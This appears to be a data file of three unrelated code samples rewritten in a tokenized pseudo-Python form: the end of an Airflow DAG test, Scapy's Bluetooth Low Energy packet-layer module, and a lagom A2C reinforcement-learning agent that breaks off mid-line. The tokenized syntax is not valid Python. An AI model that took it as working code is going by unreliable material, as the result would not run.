dag.tasks[3].__class__.__name__)<line_sep>self.assertEqual("CrossTenantDependencySensor" dag.tasks[4].__class__.__name__)<block_end><block_end> |
# This file is for use with Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Airbus DS CyberSecurity
# Authors: <NAME>, <NAME>, <NAME>
# This program is published under a GPLv2 license
"""Bluetooth 4LE layer"""<import_stmt>struct<import_from_stmt>scapy.modules.six.moves range<import_from_stmt>scapy.compat orb chb<import_from_stmt>scapy.config conf<import_from_stmt>scapy.data DLT_BLUETOOTH_LE_LL DLT_BLUETOOTH_LE_LL_WITH_PHDR DLT_NORDIC_BLE PPI_BTLE<import_from_stmt>scapy.fields BitEnumField BitField ByteEnumField ByteField Field FlagsField LEIntField LEShortEnumField LEShortField StrFixedLenField MACField PacketListField SignedByteField LEX3BytesField XBitField XByteField XShortField XLEIntField XLEShortField<import_from_stmt>scapy.layers.bluetooth EIR_Hdr L2CAP_Hdr<import_from_stmt>scapy.layers.ppi PPI_Element PPI_Hdr<import_from_stmt>scapy.packet Packet bind_layers<import_from_stmt>scapy.utils mac2str str2mac<line_sep>####################
# Transport Layers #
####################
<class_stmt>BTLE_PPI(PPI_Element)<block_start>"""Cooked BTLE PPI header
See ``ppi_btle_t`` in
https://github.com/greatscottgadgets/libbtbb/blob/master/lib/src/pcap.c
"""<line_sep>name="BTLE PPI header"<line_sep>fields_desc=[ByteField("btle_version" 0) # btle_channel is a frequency in MHz. Named for consistency with
# other users.
LEShortField("btle_channel" <none>) ByteField("btle_clkn_high" <none>) LEIntField("btle_clk_100ns" <none>) SignedByteField("rssi_max" <none>) SignedByteField("rssi_min" <none>) SignedByteField("rssi_avg" <none>) ByteField("rssi_count" <none>)]<block_end><class_stmt>BTLE_RF(Packet)<block_start>"""Cooked BTLE link-layer pseudoheader.
http://www.whiterocker.com/bt/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html
"""<line_sep>name="BTLE RF info header"<line_sep>fields_desc=[ByteField("rf_channel" 0) SignedByteField("signal" -128) SignedByteField("noise" -128) ByteField("access_address_offenses" 0) XLEIntField("reference_access_address" 0) FlagsField("flags" 0 -16 ["dewhitened" "sig_power_valid" "noise_power_valid" "decrypted" "reference_access_address_valid" "access_address_offenses_valid" "channel_aliased" "res1" "res2" "res3" "crc_checked" "crc_valid" "mic_checked" "mic_valid" "res4" "res5"])]<block_end><class_stmt>NORDIC_BLE(Packet)<block_start>"""Cooked Nordic BTLE link-layer pseudoheader.
"""<line_sep>name="BTLE Nordic info header"<line_sep>fields_desc=[ByteField("board" 0) LEShortField("payload_len" <none>) ByteField("protocol" 0) LEShortField("packet_counter" 0) ByteField("packet_id" 0) ByteField("packet_len" 10) ByteField("flags" 0) ByteField("channel" 0) ByteField("rssi" 0) LEShortField("event_counter" 0) LEIntField("delta_time" 0) ]<def_stmt>post_build self p pay<block_start><if_stmt>self.payload_len<is><none><block_start>p=p[:1]+chb(len(pay)+10)+p[2:]<block_end><return>p+pay<block_end><block_end>##########
# Fields #
##########
<class_stmt>BDAddrField(MACField)<block_start><def_stmt>__init__ self name default resolve=<false><block_start>MACField.__init__(self name default)<if_stmt>resolve<block_start>conf.resolve.add(self)<block_end><block_end><def_stmt>i2m self pkt x<block_start><if_stmt>x<is><none><block_start><return>b"\0\0\0\0\0\0"<block_end><return>mac2str(':'.join(x.split(':')[::-1]))<block_end><def_stmt>m2i self pkt x<block_start><return>str2mac(x[::-1])<block_end><block_end><class_stmt>BTLEChanMapField(XByteField)<block_start><def_stmt>__init__ self name default<block_start>Field.__init__(self name default "<Q")<block_end><def_stmt>addfield self pkt s val<block_start><return>s+struct.pack(self.fmt self.i2m(pkt val))[:5]<block_end><def_stmt>getfield self pkt s<block_start><return>s[5:] self.m2i(pkt struct.unpack(self.fmt s[:5]+b"\x00\x00\x00")[0])<block_end><block_end># noqa: E501
##########
# Layers #
##########
<class_stmt>BTLE(Packet)<block_start>name="BT4LE"<line_sep>fields_desc=[XLEIntField("access_addr" 0x8E89BED6) LEX3BytesField("crc" <none>)]<line_sep>@staticmethod<def_stmt>compute_crc pdu init=0x555555<block_start><def_stmt>swapbits a<block_start>v=0<if_stmt>a&0x80<ne>0<block_start>v<augor>0x01<block_end><if_stmt>a&0x40<ne>0<block_start>v<augor>0x02<block_end><if_stmt>a&0x20<ne>0<block_start>v<augor>0x04<block_end><if_stmt>a&0x10<ne>0<block_start>v<augor>0x08<block_end><if_stmt>a&0x08<ne>0<block_start>v<augor>0x10<block_end><if_stmt>a&0x04<ne>0<block_start>v<augor>0x20<block_end><if_stmt>a&0x02<ne>0<block_start>v<augor>0x40<block_end><if_stmt>a&0x01<ne>0<block_start>v<augor>0x80<block_end><return>v<block_end>state=swapbits(init&0xff)+(swapbits((init<rshift>8)&0xff)<lshift>8)+(swapbits((init<rshift>16)&0xff)<lshift>16)<line_sep># noqa: E501
lfsr_mask=0x5a6000<for_stmt>i (orb(x)<for>x pdu)<block_start><for_stmt>j range(8)<block_start>next_bit=(state^i)&1<line_sep>i<augrshift>1<line_sep>state<augrshift>1<if_stmt>next_bit<block_start>state<augor>1<lshift>23<line_sep>state<augxor>lfsr_mask<block_end><block_end><block_end><return>struct.pack("<L" state)[:-1]<block_end><def_stmt>post_build self p pay# Switch payload and CRC
<block_start>crc=p[-3:]<line_sep>p=p[:-3]+pay<line_sep>p<augadd>crc<if>self.crc<is><not><none><else>self.compute_crc(p[4:])<line_sep><return>p<block_end><def_stmt>post_dissect self s<block_start>self.raw_packet_cache=<none># Reset packet to allow post_build
<return>s<block_end><def_stmt>pre_dissect self s# move crc
<block_start><return>s[:4]+s[-3:]+s[4:-3]<block_end><def_stmt>hashret self<block_start><return>struct.pack("!L" self.access_addr)<block_end><block_end><class_stmt>BTLE_ADV(Packet)<block_start>name="BTLE advertising header"<line_sep>fields_desc=[BitEnumField("RxAdd" 0 1 {0:"public" 1:"random"}) BitEnumField("TxAdd" 0 1 {0:"public" 1:"random"}) BitField("RFU" 0 2) # Unused
BitEnumField("PDU_type" 0 4 {0:"ADV_IND" 1:"ADV_DIRECT_IND" 2:"ADV_NONCONN_IND" 3:"SCAN_REQ" # noqa: E501
4:"SCAN_RSP" 5:"CONNECT_REQ" 6:"ADV_SCAN_IND"}) # noqa: E501
BitField("unused" 0 2) # Unused
XBitField("Length" <none> 6) ]<def_stmt>post_build self p pay<block_start>p<augadd>pay<if_stmt>self.Length<is><none><block_start><if_stmt>len(pay)<g>2<block_start>l_pay=len(pay)<block_end><else_stmt><block_start>l_pay=0<block_end>p=p[:1]+chb(l_pay&0x3f)+p[2:]<block_end><if_stmt><not>isinstance(self.underlayer BTLE)<block_start>self.add_underlayer(BTLE)<block_end><return>p<block_end><block_end><class_stmt>BTLE_DATA(Packet)<block_start>name="BTLE data header"<line_sep>fields_desc=[BitField("RFU" 0 3) # Unused
BitField("MD" 0 1) BitField("SN" 0 1) BitField("NESN" 0 1) BitEnumField("LLID" 0 2 {1:"continue" 2:"start" 3:"control"}) ByteField("len" <none>) # BLE 4.2 and upwards can use 1 entire byte for length
]<def_stmt>post_build self p pay<block_start><if_stmt>self.len<is><none><block_start>p=p[:-1]+chb(len(pay))<block_end><return>p+pay<block_end><def_stmt>do_dissect_payload self s<block_start><if_stmt>s<is><not><none><block_start>cls=self.guess_payload_class(s)<try_stmt><block_start>p=cls(s _internal=1 _underlayer=self)<block_end><except_stmt>KeyboardInterrupt<block_start><raise><block_end><except_stmt>Exception<block_start><if_stmt>conf.debug_dissector<block_start><if_stmt>issubtype(cls Packet)<block_start>log_runtime.error("%s dissector failed"%cls.__name__)<block_end><else_stmt><block_start>log_runtime.error("%s.guess_payload_class() returned [%s]"%(self.__class__.__name__ repr(cls)))<line_sep># noqa: E501
<block_end><if_stmt>cls<is><not><none><block_start><raise><block_end><block_end>p=conf.raw_layer(s _internal=1 _underlayer=self)<block_end>self.add_payload(p)<block_end><block_end><block_end><class_stmt>BTLE_EMPTY_PDU(Packet)<block_start>name="Empty data PDU"<block_end><class_stmt>BTLE_ADV_IND(Packet)<block_start>name="BTLE ADV_IND"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) PacketListField("data" <none> EIR_Hdr)]<block_end><class_stmt>BTLE_ADV_DIRECT_IND(Packet)<block_start>name="BTLE ADV_DIRECT_IND"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) BDAddrField("InitA" <none>)]<block_end><class_stmt>BTLE_ADV_NONCONN_IND(BTLE_ADV_IND)<block_start>name="BTLE ADV_NONCONN_IND"<block_end><class_stmt>BTLE_ADV_SCAN_IND(BTLE_ADV_IND)<block_start>name="BTLE ADV_SCAN_IND"<block_end><class_stmt>BTLE_SCAN_REQ(Packet)<block_start>name="BTLE scan request"<line_sep>fields_desc=[BDAddrField("ScanA" <none>) BDAddrField("AdvA" <none>)]<def_stmt>answers self other<block_start><return>BTLE_SCAN_RSP<in>other<and>self.AdvA<eq>other.AdvA<block_end><block_end><class_stmt>BTLE_SCAN_RSP(Packet)<block_start>name="BTLE scan response"<line_sep>fields_desc=[BDAddrField("AdvA" <none>) PacketListField("data" <none> EIR_Hdr)]<def_stmt>answers self other<block_start><return>BTLE_SCAN_REQ<in>other<and>self.AdvA<eq>other.AdvA<block_end><block_end><class_stmt>BTLE_CONNECT_REQ(Packet)<block_start>name="BTLE connect request"<line_sep>fields_desc=[BDAddrField("InitA" <none>) BDAddrField("AdvA" <none>) # LLDATA
XLEIntField("AA" 0x00) LEX3BytesField("crc_init" 0x0) XByteField("win_size" 0x0) XLEShortField("win_offset" 0x0) XLEShortField("interval" 0x0) XLEShortField("latency" 0x0) XLEShortField("timeout" 0x0) BTLEChanMapField("chM" 0) BitField("SCA" 0 3) BitField("hop" 0 5) ]<block_end>BTLE_Versions={6:'4.0' 7:'4.1' 8:'4.2' 9:'5.0' 10:'5.1' }<line_sep>BTLE_Versions_Supported_Opcode={'4.0':0x0B }<line_sep>BTLE_Corp_IDs={0xf:'Broadcom Corporation' 0x59:'Nordic Semiconductor ASA'}<line_sep>BTLE_CtrlPDU_optcode={0x00:'LL_CONNECTION_UPDATE_REQ' 0x01:'LL_CHANNEL_MAP_REQ' 0x02:'LL_TERMINATE_IND' 0x03:'LL_ENC_REQ' 0x04:'LL_ENC_RES' 0x05:'LL_START_ENC_REQ' 0x06:'LL_START_ENC_RES' 0x07:'LL_UNKNOWN_RSP' 0x08:'LL_FEATURE_REQ' 0x09:'LL_FEATURE_RSP' # OK
0x0A:'LL_PAUSE_ENC_REQ' 0x0B:'LL_PAUSE_ENC_RES' 0x0C:'LL_VERSION_IND' # OK
0x0D:'LL_REJECT_IND' 0x0E:'LL_SLAVE_FEATURE_REQ' 0x0F:'LL_CONNECTION_PARAM_REQ' 0x10:'LL_CONNECTION_PARAM_RES' 0x14:'LL_LENGTH_REQ' 0x15:'LL_LENGTH_RSP' }<class_stmt>CtrlPDU(Packet)<block_start>name="CtrlPDU"<line_sep>fields_desc=[ByteEnumField("optcode" 0 BTLE_CtrlPDU_optcode)]<def_stmt>do_dissect_payload self s<block_start><if_stmt>s<is><not><none><block_start>cls=self.guess_payload_class(s)<try_stmt><block_start>p=cls(s _internal=1 _underlayer=self)<block_end><except_stmt>KeyboardInterrupt<block_start><raise><block_end><except_stmt>Exception<block_start><if_stmt>conf.debug_dissector<block_start><if_stmt>issubtype(cls Packet)<block_start>log_runtime.error("%s dissector failed"%cls.__name__)<block_end><else_stmt><block_start>log_runtime.error("%s.guess_payload_class() returned [%s]"%(self.__class__.__name__ repr(cls)))<line_sep># noqa: E501
<block_end><if_stmt>cls<is><not><none><block_start><raise><block_end><block_end>p=conf.raw_layer(s _internal=1 _underlayer=self)<block_end>self.add_payload(p)<block_end><block_end><block_end><class_stmt>LL_CONNECTION_UPDATE_REQ(Packet)<block_start>name='LL_CONNECTION_UPDATE_REQ'<line_sep>fields_desc=[XByteField("win_size" 0x0) XLEShortField("win_offset" 0x0) XLEShortField("interval" 0x0) XLEShortField("latency" 0x0) XLEShortField("timeout" 0x0) XLEShortField("instant" 0x0) ]<block_end><class_stmt>LL_CHANNEL_MAP_REQ(Packet)<block_start>name='LL_CHANNEL_MAP_REQ'<line_sep>fields_desc=[BTLEChanMapField("chM" 0) XLEShortField("instant" 0x0) ]<block_end><class_stmt>LL_TERMINATE_IND(Packet)<block_start>name='LL_TERMINATE_IND'<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_ENC_REQ(Packet)<block_start>name='LL_ENC_REQ'<line_sep>fields_desc=[StrFixedLenField("rand" "" length=8) StrFixedLenField("ediv" "" length=2) StrFixedLenField("skdm" "" length=8) StrFixedLenField("ivm" "" length=4) ]<block_end><class_stmt>LL_ENC_RSP(Packet)<block_start>name='LL_ENC_RSP'<line_sep>fields_desc=[StrFixedLenField("skds" "" length=8) StrFixedLenField("ivs" "" length=4) ]<block_end><class_stmt>LL_PAUSE_ENC_REQ(Packet)<block_start>name='LL_PAUSE_ENC_REQ'<block_end><class_stmt>LL_PAUSE_ENC_RSP(Packet)<block_start>name='LL_PAUSE_ENC_RSP'<block_end><class_stmt>LL_START_ENC_REQ(Packet)<block_start>name='LL_START_ENC_REQ'<block_end><class_stmt>LL_START_ENC_RSP(Packet)<block_start>name='LL_START_ENC_RSP'<block_end><class_stmt>LL_UNKNOWN_RSP(Packet)<block_start>name='LL_UNKNOWN_RSP'<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_FEATURE_REQ(Packet)<block_start>name="LL_FEATURE_REQ"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 [# 4.0
'le_encryption' # 4.1
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' # 4.2
'le_ping' 'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 5.0
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("reserved" 0 48) ]<block_end><class_stmt>LL_FEATURE_RSP(Packet)<block_start>name="LL_FEATURE_RSP"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 ['le_encryption' # 4.0
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' 'le_ping' # 4.1
'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 4.2
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("min_used_channels" 0 1) BitField("reserved" 0 47) ]<block_end><class_stmt>LL_VERSION_IND(Packet)<block_start>name="LL_VERSION_IND"<line_sep>fields_desc=[ByteEnumField("version" 8 BTLE_Versions) LEShortEnumField("Company" 0 BTLE_Corp_IDs) XShortField("subversion" 0)]<block_end><class_stmt>LL_REJECT_IND(Packet)<block_start>name="LL_REJECT_IND"<line_sep>fields_desc=[XByteField("code" 0x0) ]<block_end><class_stmt>LL_SLAVE_FEATURE_REQ(Packet)<block_start>name="LL_SLAVE_FEATURE_REQ"<line_sep>fields_desc=[FlagsField("feature_set" 0 -16 ['le_encryption' # 4.0
'conn_par_req_proc' 'ext_reject_ind' 'slave_init_feat_exch' 'le_ping' # 4.1
'le_data_len_ext' 'll_privacy' 'ext_scan_filter' # 4.2
'll_2m_phy' 'tx_mod_idx' 'rx_mod_idx' 'le_coded_phy' 'le_ext_adv' 'le_periodic_adv' 'ch_sel_alg' 'le_pwr_class']) BitField("min_used_channels" 0 1) BitField("reserved" 0 47) ]<block_end><class_stmt>LL_LENGTH_REQ(Packet)<block_start>name=' LL_LENGTH_REQ'<line_sep>fields_desc=[XLEShortField("max_rx_bytes" 251) XLEShortField("max_rx_time" 2120) XLEShortField("max_tx_bytes" 251) XLEShortField("max_tx_time" 2120) ]<block_end><class_stmt>LL_LENGTH_RSP(Packet)<block_start>name=' LL_LENGTH_RSP'<line_sep>fields_desc=[XLEShortField("max_rx_bytes" 251) XLEShortField("max_rx_time" 2120) XLEShortField("max_tx_bytes" 251) XLEShortField("max_tx_time" 2120) ]<block_end># Advertisement (37-39) channel PDUs
bind_layers(BTLE BTLE_ADV access_addr=0x8E89BED6)<line_sep>bind_layers(BTLE BTLE_DATA)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_IND PDU_type=0)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_DIRECT_IND PDU_type=1)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_NONCONN_IND PDU_type=2)<line_sep>bind_layers(BTLE_ADV BTLE_SCAN_REQ PDU_type=3)<line_sep>bind_layers(BTLE_ADV BTLE_SCAN_RSP PDU_type=4)<line_sep>bind_layers(BTLE_ADV BTLE_CONNECT_REQ PDU_type=5)<line_sep>bind_layers(BTLE_ADV BTLE_ADV_SCAN_IND PDU_type=6)<line_sep># Data channel (0-36) PDUs
# LLID=1 -> Continue
bind_layers(BTLE_DATA L2CAP_Hdr LLID=2)# BTLE_DATA / L2CAP_Hdr / ATT_Hdr
bind_layers(BTLE_DATA CtrlPDU LLID=3)# BTLE_DATA / CtrlPDU
bind_layers(BTLE_DATA BTLE_EMPTY_PDU len=0)# BTLE_DATA / CtrlPDU
bind_layers(CtrlPDU LL_CONNECTION_UPDATE_REQ optcode=0x00)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_CHANNEL_MAP_REQ optcode=0x01)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_TERMINATE_IND optcode=0x02)# BTLE_DATA / CtrlPDU / LL_TERMINATE_IND
bind_layers(CtrlPDU LL_ENC_REQ optcode=0x03)# BTLE_DATA / CtrlPDU / LL_ENC_REQ
bind_layers(CtrlPDU LL_ENC_RSP optcode=0x04)# BTLE_DATA / CtrlPDU / LL_ENC_RSP
bind_layers(CtrlPDU LL_START_ENC_REQ optcode=0x05)# BTLE_DATA / CtrlPDU / LL_START_ENC_REQ
bind_layers(CtrlPDU LL_START_ENC_RSP optcode=0x06)# BTLE_DATA / CtrlPDU / LL_START_ENC_RSP
bind_layers(CtrlPDU LL_UNKNOWN_RSP optcode=0x07)# BTLE_DATA / CtrlPDU / LL_UNKNOWN_RSP
bind_layers(CtrlPDU LL_FEATURE_REQ optcode=0x08)# BTLE_DATA / CtrlPDU / LL_FEATURE_REQ
bind_layers(CtrlPDU LL_FEATURE_RSP optcode=0x09)# BTLE_DATA / CtrlPDU / LL_FEATURE_RSP
bind_layers(CtrlPDU LL_VERSION_IND optcode=0x0C)# BTLE_DATA / CtrlPDU / LL_VERSION_IND
bind_layers(CtrlPDU LL_REJECT_IND optcode=0x0D)# BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU LL_SLAVE_FEATURE_REQ optcode=0x0E)# BTLE_DATA / CtrlPDU / LL_SLAVE_FEATURE_REQ
bind_layers(CtrlPDU LL_LENGTH_REQ optcode=0x14)# BTLE_DATA / CtrlPDU / LL_LENGTH_REQ
bind_layers(CtrlPDU LL_LENGTH_RSP optcode=0x15)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU LL_PAUSE_ENC_REQ optcode=0x0A)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
bind_layers(CtrlPDU LL_PAUSE_ENC_RSP optcode=0x0B)# BTLE_DATA / CtrlPDU / LL_LENGTH_RSP
# TODO: more optcodes
conf.l2types.register(DLT_BLUETOOTH_LE_LL BTLE)<line_sep>conf.l2types.register(DLT_BLUETOOTH_LE_LL_WITH_PHDR BTLE_RF)<line_sep>conf.l2types.register(DLT_NORDIC_BLE NORDIC_BLE)<line_sep>bind_layers(BTLE_RF BTLE)<line_sep>bind_layers(NORDIC_BLE BTLE)<line_sep>bind_layers(PPI_Hdr BTLE_PPI pfh_type=PPI_BTLE)<line_sep> |
<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.optim<as>optim<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>torch.nn.utils clip_grad_norm_<import_from_stmt>lagom.networks BaseNetwork<import_from_stmt>lagom.networks make_fc<import_from_stmt>lagom.networks ortho_init<import_from_stmt>lagom.networks linear_lr_scheduler<import_from_stmt>lagom.policies BasePolicy<import_from_stmt>lagom.policies CategoricalHead<import_from_stmt>lagom.policies DiagGaussianHead<import_from_stmt>lagom.value_functions StateValueHead<import_from_stmt>lagom.transform ExplainedVariance<import_from_stmt>lagom.history.metrics final_state_from_segment<import_from_stmt>lagom.history.metrics terminal_state_from_segment<import_from_stmt>lagom.history.metrics bootstrapped_returns_from_segment<import_from_stmt>lagom.history.metrics gae_from_segment<import_from_stmt>lagom.agents BaseAgent<class_stmt>MLP(BaseNetwork)<block_start><def_stmt>make_params self config<block_start>self.feature_layers=make_fc(self.env_spec.observation_space.flat_dim config['network.hidden_sizes'])<line_sep>self.layer_norms=nn.ModuleList([nn.LayerNorm(hidden_size)<for>hidden_size config['network.hidden_sizes']])<block_end><def_stmt>init_params self config<block_start><for_stmt>layer self.feature_layers<block_start>ortho_init(layer nonlinearity='leaky_relu' constant_bias=0.0)<block_end><block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>forward self x<block_start><for_stmt>layer,layer_norm zip(self.feature_layers self.layer_norms)<block_start>x=layer_norm(F.celu(layer(x)))<block_end><return>x<block_end><block_end><class_stmt>Critic(BaseNetwork)<block_start><def_stmt>make_params self config<block_start>self.feature_layers=make_fc(self.env_spec.observation_space.flat_dim config['network.hidden_sizes'])<line_sep>self.layer_norms=nn.ModuleList([nn.LayerNorm(hidden_size)<for>hidden_size config['network.hidden_sizes']])<line_sep>self.output_layer=StateValueHead(config self.device config['network.hidden_sizes'][-1])<block_end><def_stmt>init_params self config<block_start><for_stmt>layer self.feature_layers<block_start>ortho_init(layer nonlinearity='leaky_relu' constant_bias=0.0)<block_end>self.make_optimizer(config)<block_end><def_stmt>make_optimizer self config **kwargs<block_start>self.optimizer=optim.Adam(self.parameters() lr=config['algo.lr_V'])<if_stmt>config['algo.use_lr_scheduler']<block_start><if_stmt>'train.iter'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.iter'] 'iteration-based')<block_end><elif_stmt>'train.timestep'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.timestep']+1 'timestep-based')<block_end><block_end><else_stmt><block_start>self.lr_scheduler=<none><block_end><block_end><def_stmt>optimizer_step self config **kwargs<block_start><if_stmt>config['agent.max_grad_norm']<is><not><none><block_start>clip_grad_norm_(self.parameters() config['agent.max_grad_norm'])<block_end><if_stmt>self.lr_scheduler<is><not><none><block_start><if_stmt>self.lr_scheduler.mode<eq>'iteration-based'<block_start>self.lr_scheduler.step()<block_end><elif_stmt>self.lr_scheduler.mode<eq>'timestep-based'<block_start>self.lr_scheduler.step(kwargs['total_T'])<block_end><block_end>self.optimizer.step()<block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>forward self x<block_start><for_stmt>layer,layer_norm zip(self.feature_layers self.layer_norms)<block_start>x=layer_norm(F.celu(layer(x)))<block_end>x=self.output_layer(x)<line_sep><return>x<block_end><block_end><class_stmt>Policy(BasePolicy)<block_start><def_stmt>make_networks self config<block_start>self.feature_network=MLP(config self.device env_spec=self.env_spec)<line_sep>feature_dim=config['network.hidden_sizes'][-1]<if_stmt>self.env_spec.control_type<eq>'Discrete'<block_start>self.action_head=CategoricalHead(config self.device feature_dim self.env_spec)<block_end><elif_stmt>self.env_spec.control_type<eq>'Continuous'<block_start>self.action_head=DiagGaussianHead(config self.device feature_dim self.env_spec min_std=config['agent.min_std'] std_style=config['agent.std_style'] constant_std=config['agent.constant_std'] std_state_dependent=config['agent.std_state_dependent'] init_std=config['agent.init_std'])<block_end><if_stmt><not>config['network.independent_V']<block_start>self.V_head=StateValueHead(config self.device feature_dim)<block_end><block_end><def_stmt>make_optimizer self config **kwargs<block_start>self.optimizer=optim.Adam(self.parameters() lr=config['algo.lr'])<if_stmt>config['algo.use_lr_scheduler']<block_start><if_stmt>'train.iter'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.iter'] 'iteration-based')<block_end><elif_stmt>'train.timestep'<in>config<block_start>self.lr_scheduler=linear_lr_scheduler(self.optimizer config['train.timestep']+1 'timestep-based')<block_end><block_end><else_stmt><block_start>self.lr_scheduler=<none><block_end><block_end><def_stmt>optimizer_step self config **kwargs<block_start><if_stmt>config['agent.max_grad_norm']<is><not><none><block_start>clip_grad_norm_(self.parameters() config['agent.max_grad_norm'])<block_end><if_stmt>self.lr_scheduler<is><not><none><block_start><if_stmt>self.lr_scheduler.mode<eq>'iteration-based'<block_start>self.lr_scheduler.step()<block_end><elif_stmt>self.lr_scheduler.mode<eq>'timestep-based'<block_start>self.lr_scheduler.step(kwargs['total_T'])<block_end><block_end>self.optimizer.step()<block_end>@property<def_stmt>recurrent self<block_start><return><false><block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>__call__ self x out_keys=['action' 'V'] info={} **kwargs<block_start>out={}<line_sep>features=self.feature_network(x)<line_sep>action_dist=self.action_head(features)<line_sep>action=action_dist.sample().detach()# TODO: detach is necessary or not ?
out['action']=action<if_stmt>'V'<in>out_keys<block_start>V=self.V_head(features)<line_sep>out['V']=V<block_end><if_stmt>'action_dist'<in>out_keys<block_start>out['action_dist']=action_dist<block_end><if_stmt>'action_logprob'<in>out_keys<block_start>out['action_logprob']=action_dist.log_prob(action)<block_end><if_stmt>'entropy'<in>out_keys<block_start>out['entropy']=action_dist.entropy()<block_end><if_stmt>'perplexity'<in>out_keys<block_start>out['perplexity']=action_dist.perplexity()<block_end><return>out<block_end><block_end><class_stmt>Agent(BaseAgent)<block_start>r"""Advantage Actor-Critic (A2C). """<def_stmt>make_modules self config<block_start>self.policy=Policy(config self.env_spec self.device)<if_stmt>config['network.independent_V']<block_start>self.critic=Critic(config self.device env_spec=self.env_spec)<block_end><block_end><def_stmt>prepare self config **kwargs<block_start>self.total_T=0<block_end><def_stmt>reset self config **kwargs<block_start><pass><block_end><def_stmt>choose_action self obs info={}<block_start>obs=torch.from_numpy(np.asarray(obs)).float().to(self.device)<if_stmt>self.training<block_start><if_stmt>self.config['network.independent_V']<block_start>out=self.policy(obs out_keys=['action' 'action_logprob' 'entropy'] info=info)<line_sep>out['V']=self.critic(obs)<block_end><else_stmt><block_start>out=self.policy(obs out_keys=['action' 'action_logprob' 'V' 'entropy'] info=info)<block_end><block_end><else_stmt><block_start><with_stmt>torch.no_grad()<block_start>out=self.policy(obs out_keys=['action'] info=info)<block_end><block_end># sanity check for NaN
<if_stmt>torch.any(torch.isnan(out['action']))<block_start><raise>ValueError('NaN!')<block_end><return>out<block_end><def_stmt>learn self D info={}<block_start>logprobs=torch.stack([info['action_logprob']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>entropies=torch.stack([info['entropy']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>all_Vs=torch.stack([info['V']<for>info D.batch_infos] 1).squeeze(-1)<line_sep>last_states=torch.from_numpy(final_state_from_segment(D)).float().to(self.device)<with_stmt>torch.no_grad()<block_start><if_stmt>self.config['network.independent_V']<block_start>last_Vs=self.critic(last_states)<block_end><else_stmt><block_start>last_Vs=self.policy(last_states out_keys=['V'])['V']<block_end><block_end>Qs=bootstrapped_returns_from_segment(D last_Vs self.config['algo.gamma'])<line_sep>Qs=torch.from_numpy(Qs.copy()).float().to(self.device)<if_stmt>self.config['agent.standardize_Q']<block_start>Qs=(Qs-Qs.mean(1 keepdim=<true>))/(Qs.std(1 keepdim=<true>)+1e-8)<block_end>As=gae_from_segment(D all_Vs last_Vs self.config['algo.gamma'] self.config['algo.gae_lambda'])<line_sep>As=torch.from_numpy(As.copy()).float().to(self.device)<if_stmt>self.config['agent.standardize_adv']<block_start>As=(As-As.mean(1 keepdim=<true>))/(As.std(1 keepdim=<true>)+1e-8)<block_end><assert_stmt>all([x.ndimension()<eq>2<for>x [logprobs entropies all_Vs Qs As]])<line_sep>policy_loss=-logprobs<times>As<line_sep>policy_loss=policy_loss.mean()<line_sep>entropy_loss=-entropies<line_sep>entropy_loss=entropy_loss.mean()<line_sep>value_loss=F.mse_loss(all_Vs Qs reduction='none')<line_sep>value_loss=value_loss.mean()<line_sep>entropy_coef=self.config['agent.entropy_coef']<line_sep>value_coef=self.config['agent.value_coef']<line_sep>loss=policy_loss+value_coef<times>value_loss+entropy_coef<times>entropy_loss<if_stmt>self.config['agent.fit_terminal_value']<block_start>terminal_states=terminal_state_from_segment(D)<if_stmt>terminal_states<is><not><none><block_start>terminal_states=torch.from_numpy(terminal_states).float().to(self.device)<line_sep>terminal_Vs=self.policy(terminal_states out_keys=['V'])['V']<line_sep>terminal_value_loss=F.mse_loss(terminal_Vs torch.zeros_like(terminal_Vs))<line_sep>terminal_value_loss_coef=self.config['agent.terminal_value_coef']<line_sep>loss<augadd>terminal_value_loss_coef<times>terminal_value_loss<block_end><block_end>self.policy.optimizer.zero_grad()<if_stmt>self.config['network.independent_V']<block_start>self.critic.optimizer.zero_grad()<block_end>loss.backward()<line_sep>self.policy.optimizer_step(self.config total_T=self.total_T)<if_stmt>self.config['network.independent_V']<block_start>self.critic.optimizer_step(self.config 